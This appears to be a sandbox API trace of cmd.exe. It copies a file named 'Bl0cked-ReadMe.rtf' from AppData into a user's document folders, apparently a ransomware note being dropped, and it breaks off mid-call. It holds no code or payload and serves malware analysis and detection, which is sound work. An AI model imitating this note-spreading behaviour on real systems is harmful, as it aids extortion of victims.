GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.884] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0128.884] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0128.884] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0128.884] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0128.884] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0128.884] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0128.884] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0128.884] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0128.884] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0128.884] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2afb50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0128.884] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2afb50, lpFilePart=0x2afb4c | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2afb4c*="Desktop") returned 0x18 [0128.884] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0128.884] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af8cc | out: lpFindFileData=0x2af8cc) returned 0xa0048 [0128.884] FindClose (in: hFindFile=0xa0048 | out: hFindFile=0xa0048) returned 1 [0128.884] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af8cc | out: lpFindFileData=0x2af8cc) returned 0xa0048 [0128.884] FindClose (in: hFindFile=0xa0048 | out: hFindFile=0xa0048) returned 1 [0128.885] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af8cc | out: lpFindFileData=0x2af8cc) returned 0xa0048 [0128.885] FindClose (in: hFindFile=0xa0048 | out: hFindFile=0xa0048) returned 1 [0128.885] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0128.885] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0128.885] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0128.885] GetEnvironmentStringsW () returned 0xa2b28* [0128.885] FreeEnvironmentStringsW (penv=0xa2b28) returned 1 [0128.885] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0128.885] GetConsoleOutputCP () returned 0x1b5 [0128.885] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0128.886] GetUserDefaultLCID () returned 0x409 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2afc90, cchData=128 | out: lpLCData="0") returned 2 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, 
lpLCData=0x2afc90, cchData=128 | out: lpLCData="0") returned 2 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2afc90, cchData=128 | out: lpLCData="1") returned 2 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0128.886] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0128.886] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0128.887] GetConsoleTitleW (in: lpConsoleTitle=0x90908, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.887] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0128.887] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0128.887] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0128.887] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") 
returned 0x76962732 [0128.888] _wcsicmp (_String1="type", _String2=")") returned 75 [0128.888] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0128.888] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0128.888] _wcsicmp (_String1="IF", _String2="type") returned -11 [0128.888] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0128.888] _wcsicmp (_String1="REM", _String2="type") returned -2 [0128.888] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0128.892] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.892] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.892] _get_osfhandle (_FileHandle=1) returned 0x7 [0128.892] GetFileType (hFile=0x7) returned 0x2 [0128.892] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0128.892] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2afb88 | out: lpMode=0x2afb88) returned 1 [0128.893] _dup (_FileHandle=1) returned 3 [0128.893] _close (_FileHandle=1) returned 0 [0128.893] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0128.893] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\wxmd5u~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2afb58, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0128.895] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0128.895] GetConsoleTitleW (in: lpConsoleTitle=0x2af988, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.895] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0128.895] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0128.895] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0128.895] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0128.896] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0128.896] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2af4ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2af4ec) returned 0x90eb8 [0128.897] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0128.897] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0128.897] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0128.897] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ae3f8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0128.897] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0128.897] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.897] GetFileType (hFile=0x54) returned 0x1 [0128.897] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.897] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ae450 | out: lpFileSizeHigh=0x2ae450*=0x0) returned 0x1632 [0128.897] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.897] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.897] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.897] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.897] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.897] GetFileType (hFile=0x4c) returned 0x1 [0128.897] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.897] 
GetFileType (hFile=0x4c) returned 0x1 [0128.897] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.897] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.898] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.898] GetFileType (hFile=0x4c) returned 0x1 [0128.898] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.898] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] GetFileType (hFile=0x4c) returned 0x1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] GetFileType (hFile=0x4c) returned 0x1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] WriteFile (in: hFile=0x4c, lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] GetFileType (hFile=0x4c) returned 0x1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] GetFileType (hFile=0x4c) returned 0x1 
[0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] GetFileType (hFile=0x4c) returned 0x1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] WriteFile (in: hFile=0x4c, lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, lpOverlapped=0x0) returned 1 [0128.899] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.899] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.899] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.899] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] GetFileType (hFile=0x4c) returned 0x1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] GetFileType (hFile=0x4c) returned 0x1 [0128.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.899] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] GetFileType (hFile=0x4c) returned 0x1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, 
lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] GetFileType (hFile=0x4c) returned 0x1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] GetFileType (hFile=0x4c) returned 0x1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] WriteFile (in: hFile=0x4c, lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] GetFileType (hFile=0x4c) returned 0x1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] GetFileType (hFile=0x4c) returned 0x1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] GetFileType (hFile=0x4c) returned 0x1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] WriteFile (in: hFile=0x4c, lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, 
lpOverlapped=0x0) returned 1 [0128.900] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.900] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.900] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.900] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] GetFileType (hFile=0x4c) returned 0x1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] GetFileType (hFile=0x4c) returned 0x1 [0128.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.900] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] GetFileType (hFile=0x4c) returned 0x1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] GetFileType (hFile=0x4c) returned 0x1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] GetFileType (hFile=0x4c) returned 0x1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] WriteFile (in: hFile=0x4c, 
lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] GetFileType (hFile=0x4c) returned 0x1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] GetFileType (hFile=0x4c) returned 0x1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] GetFileType (hFile=0x4c) returned 0x1 [0128.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.901] WriteFile (in: hFile=0x4c, lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, lpOverlapped=0x0) returned 1 [0128.901] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.901] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.901] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.901] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] GetFileType (hFile=0x4c) returned 0x1 [0128.902] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0128.902] GetFileType (hFile=0x4c) returned 0x1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] GetFileType (hFile=0x4c) returned 0x1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] GetFileType (hFile=0x4c) returned 0x1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] GetFileType (hFile=0x4c) returned 0x1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] WriteFile (in: hFile=0x4c, lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] GetFileType (hFile=0x4c) returned 0x1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0128.902] GetFileType (hFile=0x4c) returned 0x1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] GetFileType (hFile=0x4c) returned 0x1 [0128.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.902] WriteFile (in: hFile=0x4c, lpBuffer=0x2af468*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af468*, lpNumberOfBytesWritten=0x2ae46c*=0x20, lpOverlapped=0x0) returned 1 [0128.902] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.902] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae458 | out: lpNewFilePointer=0x0) returned 1 [0128.902] _get_osfhandle (_FileHandle=4) returned 0x54 [0128.903] ReadFile (in: hFile=0x54, lpBuffer=0x2af288, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae478, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesRead=0x2ae478*=0x200, lpOverlapped=0x0) returned 1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] GetFileType (hFile=0x4c) returned 0x1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] GetFileType (hFile=0x4c) returned 0x1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] WriteFile (in: hFile=0x4c, lpBuffer=0x2af288*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af288*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] GetFileType (hFile=0x4c) returned 0x1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, 
lpOverlapped=0x0 | out: lpBuffer=0x2af2d8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] GetFileType (hFile=0x4c) returned 0x1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] WriteFile (in: hFile=0x4c, lpBuffer=0x2af328*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af328*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] GetFileType (hFile=0x4c) returned 0x1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] WriteFile (in: hFile=0x4c, lpBuffer=0x2af378*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af378*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] GetFileType (hFile=0x4c) returned 0x1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af3c8*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] GetFileType (hFile=0x4c) returned 0x1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] WriteFile (in: hFile=0x4c, lpBuffer=0x2af418*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae46c, lpOverlapped=0x0 | out: lpBuffer=0x2af418*, lpNumberOfBytesWritten=0x2ae46c*=0x50, lpOverlapped=0x0) returned 1 [0128.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0128.903] GetFileType 